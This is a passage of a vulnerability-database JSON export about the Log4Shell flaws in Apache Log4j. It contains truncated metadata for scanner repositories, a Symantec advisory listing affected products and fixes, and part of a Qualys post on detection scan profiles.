Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-02-24T13:51:07", "id": "C3C6029E-8A78-5C0B-9CF6-51489E455464", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T02:07:32", "description": "# l4shunter\nTo hunt for machines vulnerable to CVE-2021-44228 or...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T21:39:28", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2021-12-19T23:01:02", "id": "645452DF-222B-51AD-963D-DB002A1FC803", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-09T09:03:12", "description": "## \u6982\u8ff0\n\nlog4j2 RCE\u6f0f\u6d1e\uff08CVE-2021-44228)\u5185\u7f51\u626b\u63cf\u5668\uff0c\u53ef\u7528\u4e8e\u5728\u4e0d\u51fa\u7f51\u7684\u6761\u4ef6\u4e0b\u8fdb\u884c\u6f0f\u6d1e\u626b\u63cf\uff0c\u5e2e\u52a9\u4f01\u4e1a\u5185...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T13:41:35", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-03-09T07:57:58", "id": "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-03T20:08:07", "description": "# CVE-2021-44228-log4j discovery [(Download the MKP package)](ht...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T10:46:53", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-42550", "CVE-2021-4104", "CVE-2021-44832", "CVE-2021-45105", "CVE-2021-45046"], "modified": "2022-01-03T18:51:19", "id": "836D22A0-0180-5937-A713-205130D72BDC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "symantec": [{"lastseen": "2022-01-21T17:31:38", "description": "**Summary**\n\nSymantec products may be susceptible to a flaw in the Apache Log4j 2 library JNDI lookup mechanism. A remote attacker, who can trigger Log4j to log crafted malicious strings, can execute arbitrary code on the target system. \n \n\n\n**Affected Product(s)**\n\nThe following products and product versions are vulnerable to the CVEs listed. **If a CVE is not listed, the product or version is not known to be vulnerable to it.**\n\n**Layer7 API Developer Portal ** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228 | 4.4 | Please refer to the following KB article: \n<https://knowledge.broadcom.com/external/article?articleId=230205> \n4.5 \n5.0 &amp; 5.0 CR1 \n5.0.2 &amp; 5.0.2.1 \n \n \n\n**Layer7 API Developer Portal SaaS** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228 | 5.0.3 | Please refer to the following KB article: \n<https://knowledge.broadcom.com/external/article?articleId=230205> \n \n \n\n**Layer7 API Gateway** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228 | 9.4 | Please refer to the following KB article: \n<https://knowledge.broadcom.com/external/article?articleId=230205> \n10.0 \n10.1 \n \n \n\n**Layer7 Live API Creator** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228 | 5.4 | Please refer to the following KB article: \n<https://knowledge.broadcom.com/external/article?articleId=230205> \n5.1-5.3 (EOS) \n \n \n\n**Symantec Advanced Authentication** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228 | 9.1 | Please refer to the following KB article: [https://knowledge.broadcom.com/external/article?articleId=230301](<https://knowledge.broadcom.com/external/article?articleId=230301>) \n9.1.01 \n9.1.02 \n \n \n\n**Symantec Endpoint Detection and Response (EDR) On-premise** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228, CVE-2021-45046 | 2.x, 3.x, 4.x | Upgrade to 4.6.8 or apply patch atp-patch-generic-4.6-1 to versions 4.6.0, 4.6.5, and 4.6.7. The product patch is only supported for versions 4.6.0 and above. All other customers must upgrade to 4.6.8. \n \n \n\n**Symantec Identity Governance and Administration** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228 | 14.2 | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230278> \n14.3 \n14.4 \n \n \n\n**Symantec Privileged Access Manager** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228, CVE-2021-45046 | 3.4.x | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230405> \n4.0.x \n \n \n\n**Symantec Privileged Access Manager Server Control** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228, , CVE-2021-45046 | 14.0.x | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230586> \n14.1.x \n \n \n\n**Symantec Privileged Identity Manager** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228, , CVE-2021-45046 | 12.9.x | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230668> \n14.0 | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230670> \n \n \n\n**Symantec SiteMinder (CA Single Sign-on)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228 | 12.8.x Policy Server | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230270> \n12.8.x Administrative UI \n12.8.x Access Gateway \n12.8.x SDK \n12.7 and 12.8 ASA Agents \n \n \n\n**Symantec VIP Authentication Hub **(_separate from Symantec VIP)_ \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228 | All Releases of AuthHub | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230768> \n \n \n\n**Web Isolation (WI) On-premise** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228 | 1.14 | Apply the Log4j patch available on Support Downloads. Please refer to the following KB article for patch instructions: <https://knowledge.broadcom.com/external/article?articleId=230812> \n \n \n\nThe following products have not been demonstrated to be affected but may be affected. Customers are advised to apply the recommended remediations to mitigate any possible risk.\n\n**LiveUpdate Administrator (LUA)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228, CVE-2021-45046 | 2.3.8, 2.3.9 | Upgrade to 2.3.10. \n \n \n\n**Symantec Endpoint Protection Manager (SEPM) ** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-44228, CVE-2021-45046 | 14.2 and above | \n\nA fix for Symantec Endpoint Protection Manager (SEPM) is available in 14.3 RU3 build 5427.\n\nPlease refer to the following KB article: <https://knowledge.broadcom.com/external/article/230359> \n \n \n\n**Symantec Endpoint Protection (SEP) for Mobile** \n--- \n**CVE** | **Remediation** \nCVE-2021-4104 | SEP for Mobile was found affected and was already remediated. \n \n \n\n**Threat Defense for Active Directory (TDAD)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2021-4104 | All versions | Upgrade to 3.6.2.4. \n \n \n\nThe following Symantec SaaS services were found to be affected. If a vulnerability was remediated in a SaaS service, customers do not need to take any additional action.\n\n**Cloud Workload Assurance (CWA)** \n--- \n**CVE** | **Remediation** \nCVE-2021-44228, CVE-2021-45046 | Some CWA dependencies were found to be affected. An initial remediation was deployed on Dec 16. The complete remediation was deployed on Dec 23. \n \n \n\n**Cloud Workload Assurance (CWP) ** \n--- \n**CVE** | **Remediation** \nCVE-2021-44228, CVE-2021-45046 | Some CWP dependencies were found to be affected. An initial remediation was deployed on Dec 16. The complete remediation was deployed on Dec 23. \n \n \n\n**Cloud Workload Protection for Storage (CWP:S)** \n--- \n**CVE** | **Remediation** \nCVE-2021-44228, CVE-2021-45046 | Some CWP:S dependencies were found to be affected. An initial remediation was deployed on Dec 16. The complete remediation was deployed on Dec 23. \n \n \n\n**Email Security Service (ESS)** \n--- \n**CVE** | **Remediation** \nCVE-2021-44228, CVE-2021-45046 | ESS was found to be affected. An initial remediation was deployed on Dec 13. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 17. \n \n \n\n**Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Remediation** \nCVE-2021-44228, CVE-2021-45046 | ICSP was found to be affected. An initial remediation was deployed on Dec 15. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 21. \n \n \n\n**Secure Access Cloud (SAC)** \n--- \n**CVE** | **Remediation** \nCVE-2021-44228 | SAC was found affected and was already remediated. \n \n \n\n**Symantec Endpoint Security (SES) ** \n--- \n**CVE** | **Remediation** \nCVE-2021-44228 | SES was found to be affected. An initial remediation was deployed on Dec 16. The complete remediation was deployed on Dec 23. \n \n \n\n**Web Isolation (WI) Cloud** \n--- \n**CVE** | **Remediation** \nCVE-2021-44228 | WI Cloud was found affected and was already remediated. \n \n \n\n**Web Security Service (WSS) Reporting** \n--- \n**CVE** | **Remediation** \nCVE-2021-44228 | WSS Reporting was found to be affected. An initial remediation was deployed on Dec 13. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 16. \n \n \n\n**Additional Product Information**\n\nThe following products are not vulnerable: \n**Advanced Secure Gateway (ASG) \nBCAAA \nCloudSOC Cloud Access Security Broker (CASB) \nContent Analysis (CA) \nCritical System Protection (CSP) \nData Center Security (DCS) \nData Loss Prevention (DLP) \nHSM Agent \nGhost Solution Suite (GSS) \nInformation Centric Analytics (ICA) \nInformation Centric Tagging (ICT) \nIntegrated Cyber Defense Exchange (ICDx) \nIntegrated Secure Gateway (ISG) \n****Intelligence Services / WebFilter / WebPulse \nIT Analytics (ITA) \nIT Management Suite \n****Layer7 Mobile API Gateway \nManagement Center (MC) \nMirror Gateway \nPacketShaper (PS) S-Series \nPolicyCenter (PC) S-Series \nProxySG \nReporter \nSecurity Analytics (SA) \nServiceDesk \n****SSL Visibility (SSLV) \nSymantec Directory \nSymantec Control Compliance Suite (CCS) \nSymantec Endpoint Encryption (SEE) \nSymantec Endpoint Protection (SEP) Agent**** \nSymantec Insight Private Cloud \nSymantec Mail Security for Microsoft Exchange (SMSMSE) \nSymantec Messaging Gateway (SMG) \nSymantec PGP Solutions \nSymantec Protection Engine (SPE) \nSymantec Protection for SharePoint Servers (SPSS) \nSymantec VIP \n**** \n**\n\n**Symantec Protection Bulletins**\n\nMultiple Symantec products can detect and provide protection against attacks exploiting CVE-2021-44228 in customer environments. Refer to the following publications for more information:\n\n * Symantec Web Application Firewall (WAF) Protection: <https://knowledge.broadcom.com/external/article/230903>\n * Symantec Protection Bulletin: <https://www.broadcom.com/support/security-center/protection-bulletin#blt3e71edabe2937935_en-us> \n \n\n\n**Issue Details**\n\n**CVE-2021-44228** \n--- \n**Severity / CVSS v3.1:** | Critical / 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \n**References:** | NVD: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \n**Impact:** | Remote code execution (RCE) \n**Description:** | The Apache Log4j 2 JNDI lookup functionality allows loading executable code from remote sources. A remote attacker, who can trigger Log4j to log crafted malicious strings, can execute arbitrary code on the target system. Other unknown security impact is also possible. \n \n \n\n**CVE-2021-4104** \n--- \n**Severity / CVSS v3.1:** | High / 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n**References:** | NVD: [CVE-2021-4104](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>) \n**Impact:** | Remote code execution \n**Description:** | Apache Log4j 1.2 allows malicious Log4j configuration files to trigger JNDI lookups and cause remote code execution. A remote attacker, with write access to the Log4 configuration, can execute arbitrary code on the target system. \n \n \n\n**CVE-2021-45046** \n--- \n**Severity / CVSS v3.x:** | Critical / 9.0 (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n**References:** | NVD: [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>) \n**Impact:** | Remote code execution, denial of service \n**Description:** | The Apache Log4j 2 JNDI lookup functionality allows loading executable code from remote sources. A remote attacker, who controls Thread Context Map (MDC) input data, can execute arbitrary code on the target system or cause denial of service. This vulnerability is caused by an incomplete fix to CVE-2021-44228 in certain non-default Log4j configurations. Apache Log4j 2.16 resolves this vulnerability. \n \n \n\n**References**\n\n * Apache Log4j Security Vulnerabilities - <https://logging.apache.org/log4j/2.x/security.html>\n * Symantec VIP Security Advisory - <https://knowledge.broadcom.com/external/article/230287/symantec-vip-security-advisory-for-log4j.html> \n\n** \nRevisions**\n\n2022-01-20 20:20 ET - A fix for CVE-2021-4104 for Threat Defense for Active Directory (TDAD) is available in 3.6.2.4. Advisory Status moved to Closed. \n2022-01-12 10:40 ET - SEP for Mobile was found affected for CVE-2021-4104 and was already remediated. Removed CVE-2021-4104 from under investigation for Symantec Endpoint Security (SES). \n2022-01-07 00:10 ET - Added Symantec VIP Security Advisory link to the references \n2021-12-27 13:20 ET - Added Symantec Endpoint Protection (SEP) for Mobile is under investigation for CVE-2021-4104. \n2021-12-23 20:10 ET - The complete remediation for CVE-2021-44228 for Cloud Workload Assurance (CWA), Cloud Workload Assurance (CWP), Cloud Workload Protection for Storage (CWP:S), and Symantec Endpoint Security (SES) was deployed on Dec 23. \n2021-12-21 20:00 ET - The complete remediation for Industrial Control System Protection (ICSP) was deployed on Dec 21. \n2021-12-20 11:15 ET - Added CVE-2021-4104 and CVE-2021-45046. \n2021-12-20 14:21 ET - On-premise Web Isolation (WI) 1.14 is affected. Apply the patch available on Support Downloads. \n2021-12-20 10:20 ET - A fix for LiveUpdate Administrator (LUA) is available in 2.3.10. \n2021-12-18 22:14 ET - Multiple Symantec products can detect and provide protection against attacks exploiting CVE-2021-44228 in customer environments. See more information in the Symantec Protection Bulletins section. \n2021-12-17 21:30 ET - Cloud Workload Assurance (CWA), Cloud Workload Protection (CWP), Cloud Workload Protection for Storage (CWP:S), and Symantec Endpoint Security (SES) were found to be affected. An initial remediation was deployed on Dec 16. Broadcom is actively working on deploying the complete remediation. \n2021-12-17 19:30 ET - A fix for Symantec Endpoint Detection and Response (EDR) On-premise is available in 4.6.8 or by applying patch atp-patch-generic-4.6-1 to versions 4.6.0, 4.6.5, and 4.6.7. \n2021-12-17 18:25 ET - Email Security Service (ESS) was found to be affected. An initial remediation was deployed on Dec 13. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 17. \n2021-12-17 16:25 ET - Web Isolation (WI) Cloud was found affected and was already remediated. \n2021-12-17 14:45 ET - Moved LiveUpdate Administrator (LUA) to the Affected Product(s). \n2021-12-17 12:00 ET - A fix for LiveUpdate Administrator (LUA) is available in 2.3.10. \n2021-12-16 18:40 ET - Intelligence Services / WebFilter / WebPulse and Threat Defense for Active Directory (TDAD) are not vulnerable. \n2021-12-16 15:00 ET - WSS Reporting was found to be affected. An initial remediation was deployed on Dec 13. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 16. \n2021-12-16 14:35 ET - Moved Cloud Workload Assurance (CWA), Cloud Workload Protection (CWP), Cloud Workload Protection for Storage (CWP:S), and SES Cloud Console (SESC) to under investigation. \n2021-12-16 12:55 ET - Added Symantec IGA to the Affected Product List along with mitigation instructions. \n2021-12-16 12:00 ET - Secure Access Cloud (SAC) was found affected and was already remediated. \n2021-12-16 9:55 ET - A fix for Symantec Endpoint Protection Manager (SEPM) is available in 14.3 RU3 build 5427. \n2021-12-15 18:20 ET - Moved Web Security Service (WSS) Reporting to under investigation. \n2021-12-15 14:45 ET - Moved Email Security Service (ESS) to under investigation. \n2021-12-15 11:00 ET - Added Symantec Privileged Access Manager to the Affected Product List along with mitigation instructions. \n2021-12-15 00:30 ET - Added Symantec Privileged Identity Manager to the Affected Product List along with mitigation instructions. \n2021-12-14 19:50 ET - Symantec Endpoint Protection (SEP) for Mobile is not vulnerable. \n2021-12-14 18:15 ET - Information Centric Tagging (ICT) and Symantec Insight Private Cloud are not vulnerable. \n2021-12-14 17:30 ET - LiveUpdate Administrator (LUA) all supported versions are affected. \n2021-12-14 15:02 ET - Email Security Service (ESS) was found affected. \n2021-12-14 14:35 ET - Management Center is not vulnerable. \n2021-12-14 13:05 ET - ICDx is not vulnerable. \n2021-12-14 12:25 ET - SEPM 14.2 and later versions are affected. \n2021-12-14 10:30 ET - Added PAM Server Control to the Affected Product List along with mitigation instructions. \n2021-12-14 00:30 ET - Added Layer7 API Gateway to the Affected Product List with remediation link referring to KB article. \n2021-12-13 17:45 ET - HSM Agent is not vulnerable. \n2021-12-13 15:20 ET - Added Layer7 AP Developer Portal, Layer7 AP Developer Portal SaaS &amp; Layer7 Live API Creator to the Affected Product List. \n2021-12-13 18:10 ET - Content Analysis (CA), Integrated Secure Gateway (ISG), Reporter, and Mirror Gateway are not vulnerable. The WSS Reporting feature was found affected and was remediated. Remote code execution was not possible, but other unknown attack vectors may have been possible. \n2021-12-13 15:20 ET - Added VIP Authentication Hub to the Affected Product List and updated the mitigation section. \n2021-12-13 15:05 ET - Added Integrated Cyber Defense Exchange (ICDx) to the list of products under investigation. Advanced Secure Gateway (ASG), BCAAA, and SSL Visibility (SSLV) are not vulnerable. \n2021-12-13 13:30 ET - Added Symantec SiteMinder to the Affected Product List along with remediation. Also PacketShaper (PS) S-Series and PolicyCenter (PC) S-Series are not vulnerable. \n2021-12-13 12:25 ET - Cloud Workload Protection (CWP), Cloud Workload Protection for Storage (CWP:S), Industrial Control System Protection (ICSP), Critical System Protection (CSP), Cloud Workload Assurance (CWA), Information Centric Analytics (ICA), and IT Analytics (ITA) are not vulnerable. \n2021-12-13 11:15 ET - Added Advanced Authentication 9.1.02 to the Affected Product List. Also Symantec Messaging Gateway (SMG) and ServiceDesk are not vulnerable. \n2021-12-13 02:00 ET - Symantec Endpoint Encryption (SEE) is not vulnerable. \n2021-12-12 11:45 ET - Symantec Mail Security for Microsoft Exchange (SMSMSE), Symantec Protection Engine (SPE), and Symantec Protection for SharePoint Servers (SPSS) are not vulnerable. \n2021-12-12 19:20 ET - Symantec Endpoint Protection (SEP) is not vulnerable. \n2021-12-12 00:20 ET - Added information about remaining Symantec products. \n2021-12-11 12:30 ET - Added the proactive notification link to Advanced Authentication, Risk Authentication &amp; Strong Authentication \n2021-12-11 12:15 ET- Updated Affected Products along with link to proactive notifications, Workarounds and Updated Non-Affected Products \n2021-12-11 06:00 ET - Updated Non-Affected Products &amp; Added Link to Product Security Advisories \n2021-12-11 00:30 ET- Added Recommended Mitigations &amp; Updated Non-Affected Products \n2021-12-10 20:30 ET- Initial Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T01:06:47", "type": "symantec", "title": "Symantec Security Advisory for Log4j Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-21T17:28:40", "id": "SMNTC-19793", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-12-21T10:37:15", "description": "We have now added two new option profiles to our library for Log4Shell vulnerabilities. Option profiles define the settings you want to use for your scan. These new option profiles are tuned to quickly detect the Log4Shell vulnerability on assets in your environment.\n\nThe following two pre-configured option profiles are now available in the library to help you get started:\n\n 1. Log4Shell - Authenticated Scan\n 2. Log4Shell \u2013 Unauthenticated Scan\n\nYou can import these profiles into your account and use them as-is or edit them as needed.\n\n### Importing Option Profiles\n\nTo import our option profiles, go to **Scans** &gt; **Option Profiles** &gt; **New** and select **Import from Library**.\n\n\n\nChoose from the **Log4Shell** - **Authenticated Scan** or **Log4Shell** \u2013 **Unauthenticated Scan** options and click **Import**.\n\nNote: Use the **Log4Shell - Authenticated Scan** option profile for authenticated scans and **Log4Shell - Unauthenticated Scan** option for unauthenticated scans. For information on authenticated and unauthenticated scans, refer to the [Why Use Host Authentication](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/authentication/authentication_lp.htm>)? section of the Online Help.\n\nWe recommend making the option profile **Global** to make it available to all users in the subscription.\n\nThe Log4Shell option profiles come with pre-defined search lists that include Log4Shell QIDs. When you scan using these option profiles, the scanner first gathers information about the host and then scans for all QIDs listed with these option profiles. For information on QIDs listed with these option profiles, refer to the Search List section.\n\nThe **Scan Settings** tab in the Option Profile information provides you with an option to view the complete list of QIDs that are included/associated with the option profile.\n\n\n\nReview the other tabs of these option profiles to confirm it suits your requirement. Note that these option profiles set the performance of the scan as **Normal**. If you are concerned about the performance impact, Qualys recommends you change these settings to match your requirement.\n\nWhen you are ready to scan your environment for Log4Shell vulnerabilities, run a scan and ensure to select these option profiles you just imported. You can associate the option profile when you trigger the scan. For more information on scans, refer to the [Scan for Vulnerabilities](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/scans/vm_scans_lp.htm>) topic in the Online Help.\n\nOnce the scan is completed, you can view the scan report to know the assets that have been affected by the vulnerabilities. Go to the reports list and check to be sure your report is finished - the status will show &quot;Finished&quot;. For more information on scan reports, refer to the [Reporting on your Vulnerabilities and Assets](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/reports/vulnerability_reports_lp.htm>) topic in the Online Help.\n\n### Search Lists\n\nQualys has released 2 search lists to cater to QIDs associated with Log4Shell:\n\n 1. **Log4Shell Dynamic Search List**: This is a** dynamic search list** that searches for vulnerabilities related to Apache Log4j2 Zero-Day Exploited in the Wild (Log4Shell). This search list includes the following CVE IDs:\n * CVE-2021-45046\n * CVE-2021-44228\n * CVE-2021-4104\n * CVE-2021-45105\n 2. **Log4Shell Static Search List**: This is a** static search list** that helps in the detection of Apache Log4j2 Zero-Day Exploited in the Wild (Log4Shell). This search list includes the following QIDs:\nQID Number| QID Title \n---|--- \n45006| Traceroute \n45017| OS Detected \n70000| NetBIOS name accessible \n82023| OpenTCPServicesList \n45039| Hostnamefound \n6| DNSHostName \n82044| NetBIOS \n34011| Firewall detected \n43007| Network adapter MAC address \n45038| Host scan time \n82062| NetBIOS Workgroup name detected \n45141| Installed Packages on Unix and Linux Operating Systems \n45179| Report Qualys Host ID Value \n90235| Installed Applications Enumerated From Windows Installer \n45456| Windows WMI Authentication Level status \n34011| Firewall detected \n45484| Correlation id service running \n48143| Correlation id detected", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T17:33:11", "type": "qualysblog", "title": "New Options Profiles for Log4Shell Detection", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-20T17:33:11", "id": "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-23T02:37:17", "description": "#### \n\n#### Update\n\nTake advantage of our free service to quickly detect vulnerabilities in your external attack surface. Visit [qualys.com/was-log4shell-help](<https://www.qualys.com/was-log4shell-help>) to get started.\n\n#### Update \u2013 December 22, 2021 7:53 PM ET\n\nA bug in external scanners could result in false negatives when unauthenticated Log4Shell scans were run with external scanners. This issue is now resolved, and the fix will be rolled out by 11 PM ET today.\n\n#### Update \u2013 December 22, 2021 5:55 AM ET\n\nAdded information about new rule and dashboard in CSAM to quickly figure out the vulnerable software and hosts.\n\n#### Update \u2013 December 20, 2021 1:00 PM ET\n\nQualys is aware of false negatives for QID 376160, 376195 and 376193. They read the file generated by the [Qualys Log4j Scan Utility](<https://github.com/Qualys/log4jscanwin>) and the signatures for addressing them are released at 1 PM ET on Dec 20th. They are part of VULNSIGS-2.5.359-3 or later.\n\n#### Update \u2013 December 18, 2021 9:00 PM ET\n\nTwo new QIDs (376194, 376195) to address CVE-2021-45105 (Log4j &lt; 2.17) were released at 9 PM ET on Dec 18th. They are part of VULNSIGS-2.5.357-9 or later.\n\n#### Update \u2013 